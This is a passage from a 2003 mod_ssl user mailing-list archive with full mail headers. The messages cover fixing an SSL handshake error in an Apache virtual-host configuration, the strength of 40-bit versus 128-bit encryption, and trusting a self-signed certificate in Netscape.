> > > Please see http://httpd.apache.org/docs-2.0/ssl/ssl_faq.html#vhosts2 .
> > Yes, I read that document and I do want to provide both http and https
on a
> > single server with one single IP address (I am NAT-ting on router with
one
> > external ip - does that matter?)
> >
> >
> > ______________________________________________________________________
> > Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> > User Support Mailing List                      modssl-users@modssl.org
> > Automated List Manager                            majordomo@modssl.org
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Aug  8 15:32:44 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id E217CA8942; Fri,  8 Aug 2003 15:32:43 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from mail4.hitachi.co.jp (mail4.hitachi.co.jp [133.145.228.5])
	by master.modssl.org (Postfix) with ESMTP id AB10EA8934
	for ; Fri,  8 Aug 2003 15:32:41 +0200 (CEST)
Received: from mc2.mcg.hitachi.co.jp by mail4.hitachi.co.jp (8.9.3p2/3.7W-mail4) id WAA27734; Fri, 8 Aug 2003 22:32:39 +0900 (JST)
Received: (from root@localhost)
	by mc2.mcg.hitachi.co.jp (8.11.6+Sun/8.11.6) id h78DWcL08385
	for ; Fri, 8 Aug 2003 22:32:38 +0900 (JST)
Received: from unknown [192.168.2.1] by mc2.mcg.hitachi.co.jp with SMTP id YAA08384 ; Fri, 8 Aug 2003 22:32:37 +0900
Received: from navsg2.hitachi.co.jp by navsg2.hitachi.co.jp (8.9.3/3.7W-navsg2) id WAA20274; Fri, 8 Aug 2003 22:32:37 +0900 (JST)
Received: from mlsv5.itg.hitachi.co.jp ([158.213.165.104])
 by navsg2.hitachi.co.jp (NAVGW 2.5.2.17) with SMTP id M2003080822323602625
 ; Fri, 08 Aug 2003 22:32:36 +0900
Received: from navgw5.itg.hitachi.co.jp by mlsv5.itg.hitachi.co.jp (8.12.6/8.12.6) id h78DWbOK022609; Fri, 8 Aug 2003 22:32:37 +0900
Received: from bisdgw.bisd.hitachi.co.jp ([133.144.87.253])
 by navgw5.itg.hitachi.co.jp (SAVSMTP 3.1.1.32) with SMTP id M2003080822323603673
 ; Fri, 08 Aug 2003 22:32:36 +0900
Received: from bisdmail.bisd.hitachi.co.jp
	by bisdgw.bisd.hitachi.co.jp (8.9.3+3.2W/3.7W-bisdgw) with ESMTP id WAA29917;
	Fri, 8 Aug 2003 22:32:36 +0900 (JST)
	(envelope-from kiyoshi@bisd.hitachi.co.jp)
Received: from localhost
	by bisdmail.bisd.hitachi.co.jp (8.11.3/3.7W-bisdmail) with ESMTP id h78DWao74416;
	Fri, 8 Aug 2003 22:32:36 +0900 (JST)
	(envelope-from kiyoshi@bisd.hitachi.co.jp)
Date: Fri, 08 Aug 2003 22:32:12 +0900 (JST)
Message-Id: <20030808.223212.74706386.kiyoshi@bisd.hitachi.co.jp>
To: modssl-users@modssl.org, achana@saysit.com.hk
Cc: kiyoshi@bisd.hitachi.co.jp
Subject: Re: But why does it work now : SSL throws SSL23_GET_SERVER_HELLO
 error
From: Kiyoshi Watanabe 
In-Reply-To: <001801c35d9b$05cad9c0$0200a8c0@com>
References: <001501c35d7d$a6fd0200$0200a8c0@com>
	<20030808.194449.71131406.kiyoshi@bisd.hitachi.co.jp>
	<001801c35d9b$05cad9c0$0200a8c0@com>
X-Mailer: Mew version 2.1 on Emacs 20.7 / Mule 4.0 (HANANOEN)
Mime-Version: 1.0
Content-Type: Text/Plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Kiyoshi Watanabe 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users


Hi arthur,

> I think that works !
> Instead of
> [ssl] # openssl s_client -connect localhost:443 -state -debug
> I key in
> [ssl] # openssl s_client -connect 192.168.100.10:443 -state -debug
> and it worked, no SSL23_GET_SERVER_HELLO error, why is that ???

I looked at your conf and realize that the conf was OK. However, your
were accessing to the localhost, which was different from your virtual
host. You can have the SSL when you access to the virtual host
directive in which you specify that the ssl engine is on.

The error happends when you access to the location in which you do not
specify that the ssl engine is on. Probably someone else can answer
this better than I do.

> I am still *VERY CONCERNED* that the output from TCPDUMP contains human
> readible data (admittedly you won't be able to get much out of that ).
> Its nothing like the plain text http transmission, try it out !

I am not sure which data you are talking about. Transmission data is
encrypted after the handshake stage completes.

-Kiyoshi
Kiyoshi Watanabe


 
> 
> ----- Original Message -----
> From: "Kiyoshi Watanabe" 
> To: ; 
> Cc: 
> Sent: Friday, August 08, 2003 06:44 AM
> Subject: Re: FRUSTRATION : SSL throws SSL23_GET_SERVER_HELLO error
> 
> 
> >
> > Hello,
> >
> > did you test the openssl command using your IP instead of localhost?
> >
> >   openssl s_client -connect your-ip-here:443 -state -debug
> >
> > Or why don't you change the VirtualHohost to _default_ temporarily and
> > see how it goes.
> >
> > -Kiyoshi
> > Kiyoshi Watanabe
> >
> >
> >
> > > > Problem #1: your OpenSSL doesn't have the error messages loaded so
> you're
> > > > getting a rather non-descriptive error message.  No big deal, it just
> > > > means you have to look harder to find out what the error means.
> > > How to I load them in order to get a more meaningful description ???
> > > I've recompiled Apache 2.0.40 several times from scratch with following
> > > additional options:
> > >
> ./configure --with-mpm=worker --enable-so --enable-rewrite --enable-ssl --wi
> > > th-ssl=/path/to/openssl --enable-proxy --auth_digest
> > >
> > >
> > > > Problem #2: SSL23_GET_SERVER_HELLO:unknown protocol: - now I bet if
> you
> > > > looked at the debug dump you'd see something very similar to:
> > > > 0000 - 3c 21 44 4f 43 54 59  > > > which was mentioned in one of those links the other guy sent you.
> It's
> > > > telling you that that's what it received from the server.  You'll
> notice
> > > > that " unencrypted.
> > > Indeed, this is the whole output :
> > > CONNECTED(00000003)
> > > write to 0809D018 [0809D060] (124 bytes => 124 (0x7C))
> > > 0000 - 80 7a 01 03 01 00 51 00-00 00 20 00 00 16 00 00   .z....Q...
> .....
> > > 0010 - 13 00 00 0a 07 00 c0 00-00 66 00 00 05 00 00 04
> .........f......
> > > 0020 - 03 00 80 01 00 80 08 00-80 00 00 65 00 00 64 00
> ...........e..d.
> > > 0030 - 00 63 00 00 62 00 00 61-00 00 60 00 00 15 00 00
> .c..b..a..`.....
> > > 0040 - 12 00 00 09 06 00 40 00-00 14 00 00 11 00 00 08
> ......@.........
> > > 0050 - 00 00 06 00 00 03 04 00-80 02 00 80 5c ec 7c 7c
> ............\.||
> > > 0060 - 60 b1 2a 84 93 cf ba f5-87 dc 22 63 27 83 c7 16
> `.*......."c'...
> > > 0070 - f0 68 eb 8b 33 43 57 05-e8 5e a1 ef               .h..3CW..^..
> > > read from 0809D018 [080A25C0] (7 bytes => 7 (0x7))
> > > 0000 - 3c 21 44 4f 43 54 59                               > > SSL_connect:error in SSLv2/v3 read server hello A
> > > 1565:error:140770FC:SSL routines:SSL23_GET_SERVER_HELLO:unknown
> > > protocol:s23_clnt.c:460:
> > >
> > > > So this tells you that your web server is in fact speaking plain HTTP
> on
> > > > port 443 rather than HTTPS.  You probably do not have "SSLEngine on"
> for
> > > > that virtual host.
> > > This defies purpose. Following is an excerpt from httpd.conf with only
> those
> > > bits that I believe are relevant . What I done that's wrong :
> > > (httpd.conf)
> > >
> > > ServerName www.saysit.com.hk:80
> > > #
> > > 
> > > # Some MIME-types for downloading Certificates and CRLs
> > >    AddType application/x-x509-ca-cert .crt
> > >    AddType application/x-pkcs7-crl    .crl
> > >    SSLSessionCache  dbm:logs/ssl_scache
> > >    SSLSessionCacheTimeout 300
> > >    SSLMutex  file:logs/mutex
> > >    SSLRandomSeed startup builtin
> > >    SSLRandomSeed connect builtin
> > > 
> > > ### Section 3: Virtual Hosts
> > > Listen 80
> > > Listen 443
> > > NameVirtualHost 192.168.1.3
> > > 
> > >     ServerName www.saysit.com.hk
> > >     ServerAdmin achana@saysit.com.hk
> > >     DocumentRoot /var/www/html
> > >     ErrorLog /usr/local/apache2/logs/saysit_error.log
> > >     CustomLog /usr/local/apache2/logs/saysit_access.log common
> > >     SetEnvIf User-Agent ".MSIE.*"\
> > >        nokeepalive ssl-unclean-shutdown \
> > >        downgrade-1.0 force-response-1.0
> > >     JkMount /saysit ajp13
> > >     JkMount /saysit/* ajp13
> > > 
> > > #
> > > 
> > > 
> > >     ServerName demo.saysit.com.hk
> > >     ServerAdmin achana@saysit.com.hk
> > >     DocumentRoot /home/nicole/MyDocument/public_html
> > >     ErrorLog /usr/local/apache2/logs/nicole_error.log
> > >     CustomLog /usr/local/apache2/logs/nicole_access.log common
> > >     
> > >        SSLEngine on
> > >        SSLCipherSuite
> > > ALL:!ADH:!EPORT56:RC4+RSA:+HIGH:+MEDIUM:+LOW:+SSLv2:+EXP:+eNULL
> > >        SSLCertificateFile /usr/share/ssl/server.crt
> > >        SSLCertificateKeyFile /usr/share/ssl/server.key
> > > ####   SSLVerifyClient require #### will prompt the client to select a
> > > certificate when browsing demo.saysit
> > >     
> > >     JkExtractSSL on
> > >     JkHTTPSIndicator HTTPS
> > >     JkSESSIONIndicator SSL_SESSION_ID
> > >     JkCIPHERIndicator SSL_CIPHER
> > >     JkCERTSIndicator SSL_CLIENT_CERT
> > >     JkMount /saysit ajp13
> > >     JkMount /saysit/* ajp13
> > > 
> > > 
> > >
> > >
> > > > Problem #3: You mentioned trying to get name-based vhosts to work with
> > > > SSL.  You must realize that this doesn't work right in the general
> case.
> > > > Please see http://httpd.apache.org/docs-2.0/ssl/ssl_faq.html#vhosts2 .
> > > Yes, I read that document and I do want to provide both http and https
> on a
> > > single server with one single IP address (I am NAT-ting on router with
> one
> > > external ip - does that matter?)
> > >
> > >
> > > ______________________________________________________________________
> > > Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> > > User Support Mailing List                      modssl-users@modssl.org
> > > Automated List Manager                            majordomo@modssl.org
> > ______________________________________________________________________
> > Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> > User Support Mailing List                      modssl-users@modssl.org
> > Automated List Manager                            majordomo@modssl.org
> 
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Sat Aug  9 11:18:47 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 939E5A8944; Sat,  9 Aug 2003 11:18:47 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from hanghau.pacific.net.hk (hanghau.pacific.net.hk [202.64.33.137])
	by master.modssl.org (Postfix) with ESMTP id 5A0D1A8933
	for ; Sat,  9 Aug 2003 11:18:45 +0200 (CEST)
Received: from westnet ([202.64.41.172])
        by hanghau.pacific.net.hk with SMTP
        id h799If0D000912 for ; Sat, 9 Aug 2003 17:18:42 +0800 (CST)
Message-ID: <003901c35d8c$bb5636e0$0200a8c0@com>
From: "Arthur Chan" 
To: 
Subject: It's alive : thank-you all, for the assistance
Date: Fri, 8 Aug 2003 17:09:09 +0800
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 5.50.4522.1200
X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4522.1200
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Arthur Chan" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

I have my Apache2+mod_ssl talking OpenSSL and working with my Tomcat now.
Thanks to all of you who helped, especially to
Jiang_Chang@trendmicro.com.cn 
kiyoshi@bisd.hitachi.co.jp 
ahmed.nauman@citigroup.com
jwoolley@apache.org


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Aug 11 08:35:30 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 9FCA2A8944; Mon, 11 Aug 2003 08:35:30 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from cwb.pacific.net.hk (cwb.pacific.net.hk [202.14.67.92])
	by master.modssl.org (Postfix) with ESMTP id 314E7A8933
	for ; Mon, 11 Aug 2003 08:35:28 +0200 (CEST)
Received: from westnet ([202.64.41.172])
        by cwb.pacific.net.hk with SMTP
        id h7B6Z9q6023898 for ; Mon, 11 Aug 2003 14:35:10 +0800 (CST)
Message-ID: <002201c35f08$30c80da0$0200a8c0@com>
From: "Arthur Chan" 
To: 
Subject: high-grade vs low-grade encryption with MD5 and DES
Date: Sun, 10 Aug 2003 14:25:26 +0800
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 5.50.4522.1200
X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4522.1200
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Arthur Chan" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Hi all.
Verisign currently has a discount on both a high grade (128bits) SSL
encrypted and a low grade (40bits) SSL encrypted certificates. The former is
priced at US$895 and the latter at US$1395.
I noticed some sites also present Verisign certificates with low-grade,
54-bits encryption from their Microsoft/IIS servers. However I cannot find a
54-bits certificate in www.verisign.com/products/site/commerce/index.html
Is this 54-bits affair only for Microsoft / IIS ???
Is low-grade encryption with 40 and 54 bits considered "compromised" ???
Are there any finance/insurance industry standard requiring a 128 bits,
high-grade encryption ???

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Aug 11 10:24:36 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 1BB43A8944; Mon, 11 Aug 2003 10:24:36 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from hanghau.pacific.net.hk (hanghau.pacific.net.hk [202.64.33.137])
	by master.modssl.org (Postfix) with ESMTP id B95D2A8933
	for ; Mon, 11 Aug 2003 10:24:33 +0200 (CEST)
Received: from westnet ([202.64.41.172])
        by hanghau.pacific.net.hk with SMTP
        id h7B8OR0D018538 for ; Mon, 11 Aug 2003 16:24:30 +0800 (CST)
Message-ID: <000d01c35f17$76bb9fc0$0200a8c0@com>
From: "Arthur Chan" 
To: 
Subject: How to installing a "trusted" certificate in Netscape
Date: Sun, 10 Aug 2003 16:14:39 +0800
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 5.50.4522.1200
X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4522.1200
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Arthur Chan" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Hi all.
This may be a trivial question...
I have signed my own ceritificate.
How do I "install" that as a "trusted" certificate so that Netscape6 doesn't
throw the warning screen that I have been presented with a certificate form
an untrusted site.

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Aug 11 12:16:56 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id A8139A8944; Mon, 11 Aug 2003 12:16:56 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from orb.pobox.com (orb.pobox.com [216.65.124.72])
	by master.modssl.org (Postfix) with ESMTP id 20DBFA8933
	for ; Mon, 11 Aug 2003 12:16:55 +0200 (CEST)
Received: from texas.pobox.com (unknown[64.49.223.111])
	by orb.pobox.com (Postfix) with ESMTP id 986B415639D
	for ; Mon, 11 Aug 2003 06:16:50 -0400 (EDT)
Received: from w3works.com (64-212-200-28.nrp1feld.roc.ny.frontiernet.net [64.212.200.28])
	(using TLSv1 with cipher DES-CBC3-SHA (168/168 bits))
	(No client certificate requested)
	by texas.pobox.com (Postfix) with ESMTP id 10DF645419
	for ; Mon, 11 Aug 2003 06:16:38 -0400 (EDT)
Date: Mon, 11 Aug 2003 06:16:49 -0400
Subject: Re: high-grade vs low-grade encryption with MD5 and DES
Content-Type: text/plain; charset=US-ASCII; format=flowed
Mime-Version: 1.0 (Apple Message framework v552)
From: Dave Paris 
To: modssl-users@modssl.org
Content-Transfer-Encoding: 7bit
In-Reply-To: <002201c35f08$30c80da0$0200a8c0@com>
Message-Id: 
X-Mailer: Apple Mail (2.552)
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Dave Paris 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

"compromised" is probably a poor word to use, "pointlessly weak" is 
more accurate.  If you're going to use SSL and you're dealing with data 
that needs to be protected longer than 5 minutes, use 128bit SSL.

-dsp

On Sunday, Aug 10, 2003, at 02:25 US/Eastern, Arthur Chan wrote:

> Hi all.
> Verisign currently has a discount on both a high grade (128bits) SSL
> encrypted and a low grade (40bits) SSL encrypted certificates. The 
> former is
> priced at US$895 and the latter at US$1395.
> I noticed some sites also present Verisign certificates with low-grade,
> 54-bits encryption from their Microsoft/IIS servers. However I cannot 
> find a
> 54-bits certificate in 
> www.verisign.com/products/site/commerce/index.html
> Is this 54-bits affair only for Microsoft / IIS ???
> Is low-grade encryption with 40 and 54 bits considered "compromised" 
> ???
> Are there any finance/insurance industry standard requiring a 128 bits,
> high-grade encryption ???
>
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
>

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Aug 11 12:48:41 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 1AE79A8944; Mon, 11 Aug 2003 12:48:41 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from hanghau.pacific.net.hk (hanghau.pacific.net.hk [202.64.33.137])
	by master.modssl.org (Postfix) with ESMTP id D45CDA8933
	for ; Mon, 11 Aug 2003 12:48:38 +0200 (CEST)
Received: from westnet ([202.64.41.172])
        by hanghau.pacific.net.hk with SMTP
        id h7BAmZ0D003863 for ; Mon, 11 Aug 2003 18:48:36 +0800 (CST)
Message-ID: <001301c35f2b$97c7ec00$0200a8c0@com>
From: "Arthur Chan" 
To: 
References: 
Subject: Re: high-grade vs low-grade encryption with MD5 and DES
Date: Sun, 10 Aug 2003 18:38:51 +0800
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 5.50.4522.1200
X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4522.1200
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Arthur Chan" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

This is really symptomatic of our industry, isn't it? We seen to be our own
worse enemy.
Back in 95, it took that French student days to crack the 40-bit codes. Now
we are talking about minutes... its disheartening. Merde. I really wonder
how some of those MS sites survive these days...

----- Original Message -----
From: "Dave Paris" 
To: 
Sent: Monday, August 11, 2003 06:16 PM
Subject: Re: high-grade vs low-grade encryption with MD5 and DES


> "compromised" is probably a poor word to use, "pointlessly weak" is
> more accurate.  If you're going to use SSL and you're dealing with data
> that needs to be protected longer than 5 minutes, use 128bit SSL.
>
> -dsp
>
> On Sunday, Aug 10, 2003, at 02:25 US/Eastern, Arthur Chan wrote:
>
> > Hi all.
> > Verisign currently has a discount on both a high grade (128bits) SSL
> > encrypted and a low grade (40bits) SSL encrypted certificates. The
> > former is
> > priced at US$895 and the latter at US$1395.
> > I noticed some sites also present Verisign certificates with low-grade,
> > 54-bits encryption from their Microsoft/IIS servers. However I cannot
> > find a
> > 54-bits certificate in
> > www.verisign.com/products/site/commerce/index.html
> > Is this 54-bits affair only for Microsoft / IIS ???
> > Is low-grade encryption with 40 and 54 bits considered "compromised"
> > ???
> > Are there any finance/insurance industry standard requiring a 128 bits,
> > high-grade encryption ???
> >
> > ______________________________________________________________________
> > Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> > User Support Mailing List                      modssl-users@modssl.org
> > Automated List Manager                            majordomo@modssl.org
> >
>
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Aug 11 13:34:44 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id E6773A8963; Mon, 11 Aug 2003 13:34:43 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from orb.pobox.com (orb.pobox.com [216.65.124.72])
	by master.modssl.org (Postfix) with ESMTP id 7B13DA8933
	for ; Mon, 11 Aug 2003 13:34:42 +0200 (CEST)
Received: from texas.pobox.com (unknown[64.49.223.111])
	by orb.pobox.com (Postfix) with ESMTP id B77C6156467
	for ; Mon, 11 Aug 2003 07:34:39 -0400 (EDT)
Received: from yourpa86z1i3g7 (unknown [209.210.104.210])
	by texas.pobox.com (Postfix) with ESMTP id CDE88453EE
	for ; Mon, 11 Aug 2003 07:34:28 -0400 (EDT)
From: "Dave Paris" 
To: 
Subject: RE: high-grade vs low-grade encryption with MD5 and DES
Date: Mon, 11 Aug 2003 07:34:29 -0400
Message-ID: 
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
X-Priority: 3 (Normal)
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook IMO, Build 9.0.2416 (9.0.2910.0)
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2800.1165
In-Reply-To: <001301c35f2b$97c7ec00$0200a8c0@com>
Importance: Normal
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Dave Paris" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

The "5 minutes" I mentioned doesn't implicitly refer to the amount of time
needed to crack the ciphertext, but more the type of data and the amount of
time it needs to be protected.

A couple examples:

Example 1:
A password which will only work for the next ten minutes only needs to be
protected by encryption capable of rendering the text sufficiently scrambled
for that 10 minute duration.  This might mean it would take an attacker 1
minute to obtain the ciphertext and get it into a state where it can be
cryptanalyzed.  Four or five minutes to determine the cipher used.  Then the
attacker is left with only 3 or 4 minutes to break the cipher if they need
one minute to actually use the password.  So, how strong do you need
encryption in this case?  Only long enough to hold out against a 3 to 4
minute attack.

Example 2:
A "sealed" court case which is mandated to be sealed for 20 years needs to
be protected by a cipher capable of using a large enough keyspace to keep a
sustained attack against the data at bay for that 20 years.

Herein lies the challenge in the practical utilization of cryptography...
how do we know what will protect data for 20 years?  We don't.  So we make
educated guesses.  We make compromizes.  We use "best-available".  In the
example of the password above, 56 bit DES would be a reasonable choice.
It's fast, but weak - yet strong enough to keep that password encrypted for
the two or three - heck, six, minutes it would be attacked. (this is not to
say that one should use the weakest available cipher for any given problem
set!  3DES, AES, or Blowfish would be a much better choice in any case.)  In
the example of the sealed court records, we're not worried about transaction
speed or decryption speed so an asymmetric cipher capable of utilizing a
4096 bit (or larger!) private key is much more appropriate.

Kind Regards,
-dsp


-----Original Message-----
From: owner-modssl-users@modssl.org
[mailto:owner-modssl-users@modssl.org]On Behalf Of Arthur Chan
Sent: Sunday, August 10, 2003 6:39 AM
To: modssl-users@modssl.org
Subject: Re: high-grade vs low-grade encryption with MD5 and DES


This is really symptomatic of our industry, isn't it? We seen to be our own
worse enemy.
Back in 95, it took that French student days to crack the 40-bit codes. Now
we are talking about minutes... its disheartening. Merde. I really wonder
how some of those MS sites survive these days...

----- Original Message -----
From: "Dave Paris" 
To: 
Sent: Monday, August 11, 2003 06:16 PM
Subject: Re: high-grade vs low-grade encryption with MD5 and DES


> "compromised" is probably a poor word to use, "pointlessly weak" is
> more accurate.  If you're going to use SSL and you're dealing with data
> that needs to be protected longer than 5 minutes, use 128bit SSL.
>
> -dsp
>
> On Sunday, Aug 10, 2003, at 02:25 US/Eastern, Arthur Chan wrote:
>
> > Hi all.
> > Verisign currently has a discount on both a high grade (128bits) SSL
> > encrypted and a low grade (40bits) SSL encrypted certificates. The
> > former is
> > priced at US$895 and the latter at US$1395.
> > I noticed some sites also present Verisign certificates with low-grade,
> > 54-bits encryption from their Microsoft/IIS servers. However I cannot
> > find a
> > 54-bits certificate in
> > www.verisign.com/products/site/commerce/index.html
> > Is this 54-bits affair only for Microsoft / IIS ???
> > Is low-grade encryption with 40 and 54 bits considered "compromised"
> > ???
> > Are there any finance/insurance industry standard requiring a 128 bits,
> > high-grade encryption ???
> >
> > ______________________________________________________________________
> > Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> > User Support Mailing List                      modssl-users@modssl.org
> > Automated List Manager                            majordomo@modssl.org
> >
>
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org



______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Aug 11 14:02:00 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 45FCAA8944; Mon, 11 Aug 2003 14:02:00 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from hanghau.pacific.net.hk (hanghau.pacific.net.hk [202.64.33.137])
	by master.modssl.org (Postfix) with ESMTP id 1946EA8933
	for ; Mon, 11 Aug 2003 14:01:57 +0200 (CEST)
Received: from westnet ([202.64.41.172])
        by hanghau.pacific.net.hk with SMTP
        id h7BC1r0D025266 for ; Mon, 11 Aug 2003 20:01:54 +0800 (CST)
Message-ID: <000801c35f35$d5284f40$0200a8c0@com>
From: "Arthur Chan" 
To: 
References: 
Subject: Re: high-grade vs low-grade encryption with MD5 and DES
Date: Sun, 10 Aug 2003 19:52:09 +0800
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 5.50.4522.1200
X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4522.1200
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Arthur Chan" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Practicality : do not use 4096 bits server side private key. No, not even
2048.
Key size larger than 1024 is not supported by those bollocky client
browsers. Netscape and MSIE4 come to mind.
Regards,
Arthur Chan

----- Original Message -----
From: "Dave Paris" 
To: 
Sent: Monday, August 11, 2003 07:34 PM
Subject: RE: high-grade vs low-grade encryption with MD5 and DES


> The "5 minutes" I mentioned doesn't implicitly refer to the amount of time
> needed to crack the ciphertext, but more the type of data and the amount
of
> time it needs to be protected.
>
> A couple examples:
>
> Example 1:
> A password which will only work for the next ten minutes only needs to be
> protected by encryption capable of rendering the text sufficiently
scrambled
> for that 10 minute duration.  This might mean it would take an attacker 1
> minute to obtain the ciphertext and get it into a state where it can be
> cryptanalyzed.  Four or five minutes to determine the cipher used.  Then
the
> attacker is left with only 3 or 4 minutes to break the cipher if they need
> one minute to actually use the password.  So, how strong do you need
> encryption in this case?  Only long enough to hold out against a 3 to 4
